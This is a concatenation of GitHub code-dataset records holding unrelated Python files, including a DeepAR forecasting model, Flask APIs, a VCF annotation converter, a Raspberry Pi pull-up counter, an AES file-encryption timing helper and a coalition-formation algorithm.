\n    def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, layer_num = 2, bidirectional = True, device = 'cpu'):\n        super(DeepAR, self).__init__()\n        self.input_window_size = input_window_size\n        self.predicted_step = predicted_step\n        self.num_neurons = num_neurons\n        self.device = device\n        self.layer_num = layer_num\n        self.D = 1\n        if bidirectional:\n            self.D = 2\n        self.gru = nn.GRU(1, self.num_neurons, self.layer_num, batch_first=True, bidirectional = bidirectional)\n        self.distribution_mu = nn.Linear(self.D*self.num_neurons, self.predicted_step)\n        self.distribution_presigma = nn.Linear(self.D*self.num_neurons, self.predicted_step)\n        self.distribution_sigma = nn.Softplus()\n    \n    def forward(self, x):\n        hidden_state0 = torch.zeros(self.D*self.layer_num, x.size(0), self.num_neurons).to(self.device)\n        output, _ = self.gru(x, hidden_state0)\n        pre_sigma = self.distribution_presigma(output[:,-1,:])\n        mu = self.distribution_mu(output[:,-1,:])\n        sigma = self.distribution_sigma(pre_sigma)\n        return mu, sigma","repo_name":"icarusunimelb/Multi-objective-gradient-descent-wind-power-interval-prediction","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8268512893","text":"from sys import stdout\n\ndef solve():\n    n,k = map(int,input().split())\n    \n    checksum = 0\n\n    for x in range (n):\n        question = x ^ checksum\n        checksum = x\n        print(question)\n        stdout.flush()\n        ans = int(input())\n        if (ans == 1):\n            break\n        else:\n            continue\n\n\ndef main():\n    t = int(input())\n    for _ in range (t):\n        solve()\n\nmain()","repo_name":"3-24/problem-solving","sub_path":"codeforces/1543/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16030047839","text":"import asyncio\nimport aiofiles\n\n\ndef read_large_file():\n    with open('..\\\\data\\\\big_file.txt', 'r') as f:\n        return f.read()\n\n\n# while the file is being read, other coroutines can do some work\nasync def async_read_large_file():\n    async with aiofiles.open('..\\\\data\\\\big_file.txt', 'r') as f:\n        return await f.read()\n\n\ndef count_words(text):\n    return len(text.split(' '))\n\n\n# asynchronous execution of the program\nasync def async_main():\n    text = await async_read_large_file()\n    print(count_words(text))\n\n\n# sequential execution of the program\ndef main():\n    text = read_large_file()\n    print(count_words(text))\n\n\nif __name__ == \"__main__\":\n    asyncio.run(async_main())\n    main()\n","repo_name":"stepanskyvlad/Learning-Python","sub_path":"Multithreading_and_Multiprocessing/Module_asyncio/03_async_files.py","file_name":"03_async_files.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11067490115","text":"import os, random, struct\nimport numpy as np\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nimport time\n\n\ndef encrypt_file(key, input_path, chunksize=64*1024, use_aesni=True):\n    \"\"\" Encrypts a file using AES (CTR mode) with the\n    given key.\n\n    key:\n        The encryption key - a string that must be\n        either 16, 24 or 32 bytes long. Longer keys\n        are more secure.\n\n    input_path:\n        Name of the input file\n\n    output_path:\n        If None, '<input_path>.enc' will be used.\n\n    chunksize:\n        Sets the size of the chunk which the function\n        uses to read and encrypt the file.
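 (Reading the input in fixed-size chunks keeps memory use roughly constant even for very large files.)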
Larger chunk\n sizes can be faster for some files and machines.\n chunksize must be divisible by 16.\n \"\"\"\n output_path = os.path.join(os.path.dirname(input_path), 'encrypted_' + os.path.basename(input_path))\n #iv = Random.new().read(16)\n encryptor = AES.new(key, AES.MODE_CTR, use_aesni=use_aesni)\n filesize = os.path.getsize(input_path)\n encryption_time = []\n with open(input_path, 'rb') as infile:\n with open(output_path, 'wb') as outfile:\n outfile.write(struct.pack(' 0 and len(bomb_effects) > 0:\n first_effects = bomb_effects.popleft()\n last_casting = bomb_casing.pop()\n current_result = first_effects + last_casting\n flag = False\n\n for ch in dict_bombs:\n if dict_bombs[ch] == current_result:\n flag = True\n add_dict[ch] += 1\n break\n\n if (add_dict[\"Cherry Bombs\"] >= 3) and (add_dict[\"Datura Bombs\"] >= 3) and (add_dict[\"Smoke Decoy Bombs\"] >= 3):\n condition = True\n break\n\n if not flag:\n last_casting -= 5\n bomb_effects.appendleft(first_effects)\n bomb_casing.append(last_casting)\n\n\nif not condition:\n print(\"You don't have enough materials to fill the bomb pouch.\")\nelse:\n print(\"Bene! You have successfully filled the bomb pouch!\")\n\nif len(bomb_effects) == 0:\n print(f\"Bomb Effects: empty\")\nelse:\n print(f\"Bomb Effects: {', '.join(str(ch) for ch in bomb_effects)}\")\n\nif len(bomb_casing) == 0:\n print(f\"Bomb Casings: empty\")\nelse:\n print(f\"Bomb Casings: {', '.join(str(ch) for ch in bomb_casing)}\")\n\nfor keys, values in add_dict.items():\n print(f\"{keys}: {values}\")","repo_name":"AlexanderBedrosyan/Programming-Advanced-with-Python","sub_path":"Advanced Exam Preparation/Regular Exam - 27 June 2020/bombs.py","file_name":"bombs.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15879563859","text":"import unittest\n\nfrom view_layer_common import *\n\n\n# ############################################################\n# Testing\n# ############################################################\n\nclass UnitTesting(MoveLayerCollectionTesting):\n def get_reference_scene_tree_map(self):\n # original tree, no changes\n reference_tree_map = [\n ['A', [\n ['i', None],\n ['ii', None],\n ['iii', None],\n ]],\n ['B', None],\n ['C', [\n ['1', None],\n ['2', None],\n ['3', [\n ['dog', None],\n ['cat', None],\n ]],\n ]],\n ]\n return reference_tree_map\n\n def get_reference_layers_tree_map(self):\n # original tree, no changes\n reference_layers_map = [\n ['Layer 1', [\n 'Master Collection',\n 'C',\n '3',\n ]],\n ['Layer 2', [\n 'C',\n '3',\n 'dog',\n 'cat',\n ]],\n ]\n return reference_layers_map\n\n def test_layer_collection_into(self):\n \"\"\"\n Test outliner operations\n \"\"\"\n self.setup_tree()\n self.assertFalse(self.move_into(\"Layer 1.C.2\", \"Layer 2.3\"))\n self.compare_tree_maps()\n\n\n# ############################################################\n# Main - Same For All Render Layer Tests\n# ############################################################\n\nif __name__ == '__main__':\n UnitTesting._extra_arguments = setup_extra_arguments(__file__)\n unittest.main()\n","repo_name":"blender/blender","sub_path":"tests/python/view_layer/test_move_into_layer_collection_a.py","file_name":"test_move_into_layer_collection_a.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"} +{"seq_id":"17077291676","text":"from flask import request\nfrom flask_restx import 
Resource, Namespace\n\nfrom dao.model.movie import MovieSchema\nfrom implemented import movie_service\nfrom service.decorators import admin_required, auth_required\n\nmovie_ns = Namespace('movies')\n\n\n@movie_ns.route('/')\nclass MoviesView(Resource):\n    @auth_required  # decorator: access only after registration\n    def get(self):\n        # fetch all movies\n        director = request.args.get(\"director_id\")\n        genre = request.args.get(\"genre_id\")\n        year = request.args.get(\"year\")\n        filters = {\n            \"director_id\": director,\n            \"genre_id\": genre,\n            \"year\": year,\n        }\n        all_movies = movie_service.get_all(filters)\n        res = MovieSchema(many=True).dump(all_movies)\n        return res, 200\n\n    @admin_required  # decorator: checks the role (admin or not)\n    def post(self):\n        # add a movie\n        req_json = request.json\n        movie = movie_service.create(req_json)\n        return \"\", 201, {\"location\": f\"/movies/{movie.id}\"}\n\n\n@movie_ns.route('/<int:bid>')\nclass MovieView(Resource):\n    @auth_required  # decorator: access only after registration\n    def get(self, bid):\n        # get a movie by ID\n        b = movie_service.get_one(bid)\n        sm_d = MovieSchema().dump(b)\n        return sm_d, 200\n\n    @admin_required  # decorator: checks the role (admin or not)\n    def put(self, bid):\n        # edit the movie's information\n        req_json = request.json\n        if \"id\" not in req_json:\n            req_json[\"id\"] = bid\n        movie_service.update(req_json)\n        return \"\", 204\n\n    @admin_required  # decorator: checks the role (admin or not)\n    def delete(self, bid):\n        # delete a movie\n        movie_service.delete(bid)\n        return \"\", 204\n","repo_name":"Nik16221/HW19","sub_path":"views/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5248678418","text":"#!/usr/bin/env python3\n\n# Takes in VCF file annotated with medaka tools annotate and converts\n#\n# Usage statement:\n# python convert_VCF_info_fields.py in_vcf.vcf out_vcf.vcf\n\n# 10/21/2020 - Nathan P. 
Roach, natproach@gmail.com\n\nimport re\nimport sys\nfrom collections import OrderedDict\nfrom math import log10\n\nimport scipy.stats\n\n\ndef pval_to_phredqual(pval):\n    try:\n        ret = round(-10 * log10(pval))\n    except ValueError:\n        ret = 2147483647  # transform pval of 0.0 to max signed 32 bit int\n    return ret\n\n\ndef parseInfoField(info):\n    info_fields = info.split(\";\")\n    info_dict = OrderedDict()\n    for info_field in info_fields:\n        code, val = info_field.split(\"=\")\n        info_dict[code] = val\n    return info_dict\n\n\ndef annotateVCF(in_vcf_filepath, out_vcf_filepath):\n    \"\"\"Postprocess output of medaka tools annotate.\n\n    Splits multiallelic sites into separate records.\n    Replaces medaka INFO fields that might represent information of the ref\n    and multiple alternate alleles with simple ref, alt allele counterparts.\n    \"\"\"\n\n    in_vcf = open(in_vcf_filepath, \"r\")\n    # medaka INFO fields that do not make sense after splitting of\n    # multi-allelic records\n    # DP will be overwritten with the value of DPSP because medaka tools\n    # annotate currently only calculates the latter correctly\n    # (https://github.com/nanoporetech/medaka/issues/192).\n    # DPS, which is as unreliable as DP, gets skipped and the code\n    # calculates the spanning reads equivalent DPSPS instead.\n    to_skip = {\"SC\", \"SR\", \"AR\", \"DP\", \"DPSP\", \"DPS\"}\n    # matches structured metadata lines like ##INFO=<ID=xyz,...> and\n    # captures the line type, the ID and any remaining attributes\n    struct_meta_pat = re.compile(r\"##(.+?)=<ID=([^,>]+)(.*)>\")\n    header_lines = []\n    contig_ids = set()\n    contig_ids_simple = set()\n    # parse the metadata lines of the input VCF and drop:\n    # - duplicate lines\n    # - INFO lines declaring keys we are not going to write\n    # - redundant contig information\n    while True:\n        line = in_vcf.readline()\n        if line[:2] != \"##\":\n            assert line.startswith(\"#CHROM\")\n            break\n        if line in header_lines:\n            # the annotate tool may generate lines already written by\n            # medaka variant again (example: medaka version line)\n            continue\n        match = struct_meta_pat.match(line)\n        if match:\n            match_type, match_id, match_misc = match.groups()\n            if match_type == \"INFO\":\n                if match_id == \"DPSP\":\n                    line = line.replace(\"DPSP\", \"DP\")\n                elif match_id in to_skip:\n                    continue\n            elif match_type == \"contig\":\n                contig_ids.add(match_id)\n                if not match_misc:\n                    # the annotate tools writes its own contig info,\n                    # which is redundant with contig info generated by\n                    # medaka variant, but lacks a length value.\n                    # We don't need the incomplete line.\n                    contig_ids_simple.add(match_id)\n                    continue\n        header_lines.append(line)\n    # Lets check the above assumption about each ID-only contig line\n    # having a more complete counterpart.\n    assert not (contig_ids_simple - contig_ids)\n    header_lines.insert(1, \"##convert_VCF_info_fields=0.2\\n\")\n    header_lines += [\n        '##INFO=<ID=DPSPS,Number=2,Type=Integer,Description=\"Depth of spanning reads by strand\">\\n',\n        '##INFO=<ID=AF,Number=1,Type=Float,Description=\"Spanning Reads Allele Frequency\">\\n',\n        '##INFO=<ID=FAF,Number=1,Type=Float,Description=\"Forward Spanning Reads Allele Frequency\">\\n',\n        '##INFO=<ID=RAF,Number=1,Type=Float,Description=\"Reverse Spanning Reads Allele Frequency\">\\n',\n        '##INFO=<ID=SB,Number=1,Type=Integer,Description=\"Phred-scaled strand bias of spanning reads at this position\">\\n',\n        '##INFO=<ID=DP4,Number=4,Type=Integer,Description=\"Counts of ref fwd, ref rev, alt fwd and alt rev spanning reads\">\\n',\n        '##INFO=<ID=AS,Number=4,Type=Integer,Description=\"Alignment scores of spanning reads as ref fwd, ref rev, alt fwd, alt rev\">\\n',\n        line,\n    ]\n\n    with open(out_vcf_filepath, \"w\") as out_vcf:\n        out_vcf.writelines(header_lines)\n        for line in in_vcf:\n            fields = line.split(\"\\t\")\n            info_dict = parseInfoField(fields[7])\n            sr_list = [int(x) for x in info_dict[\"SR\"].split(\",\")]\n            sc_list = [int(x) for x in info_dict[\"SC\"].split(\",\")]\n            if len(sr_list) != len(sc_list):\n                print(\"WARNING - SR and SC are different lengths, \" \"skipping variant\")\n                print(line.strip())  # Print the line for debugging purposes\n                continue\n            variant_list = fields[4].split(\",\")\n            dpsp = int(info_dict[\"DPSP\"])\n            ref_fwd, ref_rev = 0, 1\n            dpspf, dpspr = (int(x) for x in info_dict[\"AR\"].split(\",\"))\n            for i in range(0, len(sr_list), 2):\n                dpspf += sr_list[i]\n
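                # SR interleaves spanning-read counts by strand, one pair per allele:\n                # [ref_fwd, ref_rev, alt1_fwd, alt1_rev, ...]; i is the forward count,\n                # i+1 the reverse count.\n                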
dpspr += sr_list[i + 1]\n            for j, i in enumerate(range(2, len(sr_list), 2)):\n                dp4 = (sr_list[ref_fwd], sr_list[ref_rev], sr_list[i], sr_list[i + 1])\n                dp2x2 = [[dp4[0], dp4[1]], [dp4[2], dp4[3]]]\n                _, p_val = scipy.stats.fisher_exact(dp2x2)\n                sb = pval_to_phredqual(p_val)\n\n                as_ = (sc_list[ref_fwd], sc_list[ref_rev], sc_list[i], sc_list[i + 1])\n\n                info = []\n                for code in info_dict:\n                    if code in to_skip:\n                        continue\n                    val = info_dict[code]\n                    info.append(\"%s=%s\" % (code, val))\n\n                info.append(\"DP=%d\" % dpsp)\n                info.append(\"DPSPS=%d,%d\" % (dpspf, dpspr))\n\n                if dpsp == 0:\n                    info.append(\"AF=NaN\")\n                else:\n                    af = (dp4[2] + dp4[3]) / dpsp\n                    info.append(\"AF=%.6f\" % af)\n                if dpspf == 0:\n                    info.append(\"FAF=NaN\")\n                else:\n                    faf = dp4[2] / dpspf\n                    info.append(\"FAF=%.6f\" % faf)\n                if dpspr == 0:\n                    info.append(\"RAF=NaN\")\n                else:\n                    raf = dp4[3] / dpspr\n                    info.append(\"RAF=%.6f\" % raf)\n                info.append(\"SB=%d\" % sb)\n                info.append(\"DP4=%d,%d,%d,%d\" % dp4)\n                info.append(\"AS=%d,%d,%d,%d\" % as_)\n                new_info = \";\".join(info)\n                fields[4] = variant_list[j]\n                fields[7] = new_info\n                out_vcf.write(\"\\t\".join(fields))\n    in_vcf.close()\n\n\nif __name__ == \"__main__\":\n    annotateVCF(sys.argv[1], sys.argv[2])\n","repo_name":"galaxyproject/tools-iuc","sub_path":"tools/medaka/convert_VCF_info_fields.py","file_name":"convert_VCF_info_fields.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"61"} +{"seq_id":"24041656007","text":"\"\"\"\n    ** Class Memberships **\n        memberships view model\n\"\"\"\nfrom __future__ import annotations\nfrom collections.abc import Callable\nfrom typing import List\n\nfrom marshmallow import fields\nfrom _swagger_api.schemas.coupons import CouponResponseSchema\nfrom flask_apispec import doc, marshal_with, use_kwargs\nfrom _swagger_api import ViewModel\nfrom _swagger_api.schemas.memberships import MembershipPaymentResponseSchema, MembershipResponseSchema\nfrom security.api_authenticator import handle_api_auth\nfrom views import memberships_view, coupons_view\n\n\nclass MembershipsView(ViewModel):\n    \"\"\"\n    ** Class MembershipsView **\n        View model for Memberships\n    \"\"\"\n    def __new__(cls, *args, **kwargs) -> MembershipsView:\n        cls.methods: List[str] = ['GET', 'POST', 'PUT']\n        cls.method_decorators: List[Callable] = [handle_api_auth]\n        return super().__new__(cls, *args, **kwargs)\n\n    def __init__(self):\n        super().__init__()\n\n    @staticmethod\n    @doc(description=memberships_view.is_member_off.__doc__)\n    @marshal_with(MembershipResponseSchema)\n    def get(**payload) -> tuple:\n        \"\"\"\n        **get memberships**\n            Get all memberships\n        \"\"\"\n        return memberships_view.is_member_off(**payload)\n\n    @staticmethod\n    @doc(description=memberships_view.add_membership.__doc__)\n    @marshal_with(MembershipResponseSchema)\n    def post(**payload) -> tuple:\n        \"\"\"\n        **create memberships**\n            Create a new membership\n        \"\"\"\n        return memberships_view.add_membership(**payload)\n\n    @staticmethod\n    @doc(description=memberships_view.update_membership.__doc__)\n    @marshal_with(MembershipResponseSchema)\n    def put(**payload) -> tuple:\n        \"\"\"\n        ** update membership **\n            Update a membership\n        \"\"\"\n        return memberships_view.update_membership(**payload)\n\n\nclass MembershipPaymentsView(ViewModel):\n    \"\"\"\n    ** Class MembershipPaymentsView **\n        allows clients to access & create memberships payment records\n    \"\"\"\n\n    def __new__(cls, *args, **kwargs) -> MembershipPaymentsView:\n        \"\"\"new MembershipPaymentsView\"\"\"\n        
cls.methods = ['GET', 'POST', 'PUT']\n cls.method_decorators = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n \"\"\"initialize MembershipPaymentsView\"\"\"\n super().__init__()\n\n @staticmethod\n @doc(description=\"get membership payment record\")\n @marshal_with(MembershipPaymentResponseSchema)\n def get(**payload) -> tuple:\n \"\"\"\n get membership payment record\n :return:\n \"\"\"\n pass\n\n @staticmethod\n @doc(description=\"create membership payment record\")\n @marshal_with(MembershipPaymentResponseSchema)\n def post(**payload) -> tuple:\n \"\"\"\n ** create membership **\n create membership payment record\n :return:\n \"\"\"\n pass\n\n @staticmethod\n @doc(description=\"update membership payment record\")\n @marshal_with(MembershipPaymentResponseSchema)\n def put(**payload) -> tuple:\n \"\"\"\n ** update membership **\n update membership payment record\n :return:\n \"\"\"\n pass\n\n\nclass CouponsView(ViewModel):\n \"\"\"\n allows access and updating of coupon codes\n\n \"\"\"\n def __new__(cls, *args, **kwargs) -> CouponsView:\n cls.methods = ['GET', 'POST', 'PUT']\n cls.method_decorators = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n super().__init__()\n\n @staticmethod\n @doc(description=\"get coupon code\")\n @marshal_with(CouponResponseSchema)\n def get(**payload) -> tuple:\n \"\"\"\n ** get coupon codes **\n get Coupons View\n :param payload:\n :return:\n \"\"\"\n # coupon_data must include organization_id and code\n return coupons_view.get_coupon(coupon_data=payload)\n\n @staticmethod\n @doc(description=\"create coupon code\")\n @marshal_with(CouponResponseSchema)\n @use_kwargs({'organization_id': fields.String(), 'code': fields.String(), 'discount': fields.Integer(),\n 'expiration_time': fields.Integer()}, location='json')\n def post(**payload) -> tuple:\n \"\"\"\n ** create coupon codes **\n create new coupon codes\n :param payload:\n :return:\n \"\"\"\n # organization_id: str, code: str, discount: int, expiration_time: str\n return coupons_view.add_coupon(**payload)\n\n @staticmethod\n @doc(description=\"update coupon code\")\n @marshal_with(CouponResponseSchema)\n @use_kwargs({'organization_id': fields.String(), 'code': fields.String(), 'discount': fields.Integer(),\n 'expiration_time': fields.Integer()}, location='json')\n def put(**payload) -> tuple:\n \"\"\"\n ** put coupon **\n update coupon codes\n :param payload:\n :return:\n \"\"\"\n # organization_id: str, code: str, discount: int, expiration_time: int\n return coupons_view.add_coupon(**payload)\n\n\nclass CouponsListView(ViewModel):\n \"\"\"\n **Class CouponsListView**\n will return a list of all coupon codes\n \"\"\"\n\n def __new__(cls, *args, **kwargs) -> CouponsListView:\n \"\"\"New CouponsListView\"\"\"\n cls.methods = ['GET', 'POST', 'PUT', 'DELETE']\n cls.method_decorators = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n \"\"\"initialize CouponsListView\"\"\"\n super().__init__()\n\n @staticmethod\n @doc(description=\"get coupons list\")\n @use_kwargs({'organization_id': fields.String()}, location='json')\n def get(**payload) -> tuple:\n \"\"\"\n will return a list of all coupon codes\n :return:\n \"\"\"\n return 
coupons_view.get_all_coupons(organization_id=payload.get('organization_id'))\n","repo_name":"Memberships-Affiliate-Management-API/membership_and_affiliate_api","sub_path":"_swagger_api/memberships/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23996084719","text":"import sys\nimport logging\nimport traceback\nimport dramatiq\n\nfrom gold_crowdsale.scheduler.transfers import select_transfers\nfrom gold_crowdsale.scheduler.withdrawals import select_withdrawals, select_withdraw_cycles\nfrom gold_crowdsale.scheduler.queues import select_transfer_queue, select_withdraw_queue\nfrom gold_crowdsale.settings import DEFAULT_TIME_FORMAT\nfrom gold_crowdsale.rates.models import create_rate_obj\nfrom gold_crowdsale.rates.serializers import UsdRateSerializer\nfrom gold_crowdsale.transfers.models import TokenTransfer\nfrom gold_crowdsale.withdrawals.models import TransactionManager, WithdrawTransaction, WithdrawCycle\n\n\n@dramatiq.actor(max_retries=0)\ndef create_rates_task():\n    try:\n        usd_rate = create_rate_obj()\n        logging.info(f'RATES TASK: Prices updated, new values: {UsdRateSerializer(usd_rate).data} '\n                     f'at {usd_rate.creation_datetime.strftime(DEFAULT_TIME_FORMAT)}')\n    except Exception as e:\n        logging.error(f'RATES TASK FAILED: Cannot fetch new rates because: {e}')\n        logging.error('\\n'.join(traceback.format_exception(*sys.exc_info())))\n\n\n@dramatiq.actor(max_retries=0)\ndef select_created_transfers():\n    select_transfers(TokenTransfer.Status.CREATED)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_transfers():\n    select_transfers(TokenTransfer.Status.PENDING)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_processing_withdrawals():\n    select_withdrawals(\n        WithdrawTransaction.Status.CREATED,\n        WithdrawTransaction.Status.PENDING,\n        WithdrawTransaction.Status.WAITING_FOR_ERC20_TRANSFERS,\n        WithdrawTransaction.Status.WAITING_FOR_GAS_REFILL\n    )\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_withdrawals():\n    select_withdrawals(WithdrawTransaction.Status.PENDING)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_withdraw_cycles():\n    select_withdraw_cycles(WithdrawCycle.Status.PENDING)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_erc20_withdraw_queues():\n    select_withdraw_queue(TransactionManager.QueueType.ERC20)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_gas_refill_withdraw_queues():\n    select_withdraw_queue(TransactionManager.QueueType.GAS_REFILL)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_transfer_queue():\n    select_transfer_queue()\n\n","repo_name":"DucatusX/gold_crowdsale_backend","sub_path":"gold_crowdsale/scheduler/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29236037943","text":"#!/usr/bin/python\n\nimport time\nimport sys\n\nimport wiringpi2 as wiringpi\nfrom helper.InactivityTimer import InactivityTimer\nfrom sensors.MotionSensor import MotionSensor\nfrom sensors.DistanceSensor import DistanceSensor\nfrom sensors.Display import Display\nfrom sensors.Buzzer import Buzzer\nfrom sensors.Led import Led\nfrom pullup.PullupStorage import PullupStorage\nimport configuration as config\n\n\n# Globals\nINPUT = 0\nOUTPUT = 1\nLOW = 0\nHIGH = 1\n\ninactivity_timer = None\nmotion_sensor = None\ndistance_sensor = None\nlcd = None\nbuzzer = None\nled = None\n
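# handle to the persistent pullup-count backend (PullupStorage); set up in init_storage()\nstorage = 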
None\nlast_pullup_time = 0\n\npullup_count_today = 0\npullup_count_alltime = 0\npullups_to_go = config.PULLUPS_PER_DAY\n\n\ndef delay(delay_microseconds):\n time.sleep(delay_microseconds/1000000.0)\n\n\ndef delay_milli(delay_milliseconds):\n delay(delay_milliseconds * 1000)\n\n\ndef shutdown():\n global lcd\n global led\n\n if config.DEBUG:\n print(\"shutting down\")\n led.off()\n lcd.off()\n\n\ndef wakeup():\n global lcd\n global led\n global pullup_count_alltime\n global storage\n if config.DEBUG:\n print(\"waking up\")\n print(\"pullups all time: \", storage.get_alltime_count())\n print(\"pullups today: \", storage.get_today_count())\n led.on()\n lcd.on()\n lcd.message(0, 0, \"Welcome ATHLETE!\")\n lcd.message(0, 1, str(pullup_count_alltime) + \" Pullups\")\n\n\ndef count_pullup():\n global pullup_count_today\n global pullups_to_go\n global pullup_count_alltime\n global last_pullup_time\n global storage\n\n storage.count_pullup()\n\n pullup_count_today += 1\n pullup_count_alltime += 1\n pullups_to_go -= 1\n\n last_pullup_time = wiringpi.millis()\n return pullup_count_today\n\n\ndef init_storage():\n global storage\n global pullup_count_today\n global pullup_count_alltime\n global pullups_to_go\n storage = PullupStorage(config.DB_HOST, config.DB_NAME, config.DB_USER, config.DB_PASS)\n pullup_count_alltime = storage.get_alltime_count()\n pullup_count_today = storage.get_today_count()\n pullups_to_go = pullups_to_go - pullup_count_today\n\n\ndef main():\n global lcd\n global inactivity_timer\n global motion_sensor\n global distance_sensor\n global lcd\n global buzzer\n global led\n global last_pullup_time\n global pullup_count_alltime\n global pullups_to_go\n global storage\n\n wiringpi.wiringPiSetupGpio()\n\n init_storage()\n\n inactivity_timer = InactivityTimer(wakeup, shutdown, config.SHUTDOWN_DELAY)\n motion_sensor = MotionSensor(wiringpi, config.MOTION, inactivity_timer.trigger)\n distance_sensor = DistanceSensor(wiringpi, config.SONIC_ECHO, config.SONIC_TRIG)\n lcd = Display(config.LCD_RS, config.LCD_E, config.LCD_D4, config.LCD_D5, config.LCD_D6, config.LCD_D7, config.LCD_K)\n buzzer = Buzzer(wiringpi, config.BUZZER)\n led = Led(wiringpi, config.LED_PIN)\n\n distance_resetted = True\n\n shutdown()\n\n while True:\n if inactivity_timer.is_active():\n distance = distance_sensor.measure()\n\n distance_str = \"{:13.2f}\".format(distance)\n\n if config.DEBUG:\n print(distance_str + \" cm\")\n # if wiringpi.millis() % 5 == 0:\n # lcd.message(0, 0, distance_str + \" cm\")\n\n # only count a pullup if:\n # - distance is smaller than 5cm\n # - distance was resetted (athlete moved more than 20 cm away from sensor)\n # - last pullup was done more than 1 second ago\n if 0 < distance < config.COUNT_DISTANCE and distance_resetted and wiringpi.millis() > (last_pullup_time + config.RESET_TIME):\n buzzer.beep(5000)\n distance_resetted = False\n cnt = count_pullup()\n lcd.clear()\n lcd.message(0, 0, \"Pullups: \" + str(cnt).rjust(5))\n lcd.message(0, 1, \"2do2day: \" + str(pullups_to_go).rjust(5))\n elif distance > config.RESET_DISTANCE:\n distance_resetted = True\n\n delay_milli(100)\n\n inactivity_timer.loop()\n motion_sensor.sense()\n\n if config.DEBUG and inactivity_timer.is_active() == 1:\n print(\"shutting down in \" + inactivity_timer.get_seconds_till_shutdown() + \" seconds\")\n # lcd.message(0, 1, \"SHUTDOWN in: \" + inactivity_timer.get_seconds_till_shutdown().ljust(3))\n\n\nif __name__ == \"__main__\":\n try:\n if len(sys.argv) == 2 and sys.argv[1] == \"setup_storage\":\n print(\"setting 
up table in database\")\n init_storage()\n storage.setup()\n print(\"done.\")\n else:\n main()\n except (KeyboardInterrupt, SystemExit):\n shutdown()\n","repo_name":"lukey78/pullupsensor","sub_path":"pullupsensor.py","file_name":"pullupsensor.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41626535644","text":"\"\"\" opens a socket to a DNS server.\n When it fails, it prints a timestamp and a description of the failure.\n\"\"\"\nimport socket\nimport time\nfrom random import random\nfrom itertools import cycle\n\ndef socket_to_host(host=\"8.8.8.8\", port=53, timeout=3):\n \"\"\" Attempt to open a socket.\n Return bool for success and a string of info.\n \"\"\"\n try:\n socket.setdefaulttimeout(timeout)\n socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))\n return True, ''\n except socket.error as ex:\n return False, f'{ex}'\n\ndef str_now():\n \"\"\" Return a timestamp string\n \"\"\"\n return time.strftime('%b-%d %H:%M:%S', time.localtime())\n\nHOST_IPS = [\n '8.8.8.8', # google DNS server\n '208.67.222.222', # open DNS\n '208.67.220.220', # open DNS\n # '192.168.2.3', # test IP that I know will not respond\n ]\n\nTICKER = '|/-\\\\'\n\nif __name__ == '__main__':\n print(f'{__file__} starting at {str_now()}')\n\n ticks = cycle(TICKER) # circular list of spinning line characters\n host_ips = cycle(HOST_IPS) # circular list of ip addresses\n while True:\n a_host = next(host_ips)\n b_good, e_str = socket_to_host(a_host)\n if not b_good:\n print(f'FAILED at {str_now()} to {a_host} {e_str}')\n else:\n print(next(ticks)+'\\r', end=' ', flush=True)\n time.sleep(2 + random() * 2)\n","repo_name":"BobBaylor/dropout","sub_path":"dropout.py","file_name":"dropout.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8902809390","text":"class Coalition:\n\n def __init__(self, n, ch_function):\n self.n = n # no. 
of agents n\n        self.final_coalition = [] # stores the final coalition sets\n        self.discard = set() # stores the agents that are already part of a final coalition\n        self.chf_table = ch_function # characteristic function table\n\n    # forms the final optimal coalition\n    def find_optimal_coalition(self):\n        # when an agent forms a coalition, it is added to the discard set\n        # the loop runs until all the agents become part of some coalition\n        while(len(self.discard) != self.n):\n            self.find_coalition()\n\n    # it compares the optimal coalitions of each agent i and returns the most optimal among them\n    def find_coalition(self):\n        # locals are used here instead of shared globals: with the globals,\n        # calculate_si() overwrote `payoff` before the comparison below,\n        # so the best coalition across agents was never actually selected\n        best_payoff = 0\n        best_optimal = set()\n        for x in range(self.n):\n            if x in self.discard:\n                continue\n            # all the agents broadcast their most optimal coalition and the most optimal among them is chosen\n            t_payoff, t_optimal = self.calculate_si(x)\n            if t_payoff > best_payoff:\n                best_payoff = t_payoff\n                best_optimal = t_optimal\n        # all the elements which have become part of this coalition are added to the discard set\n        for x in 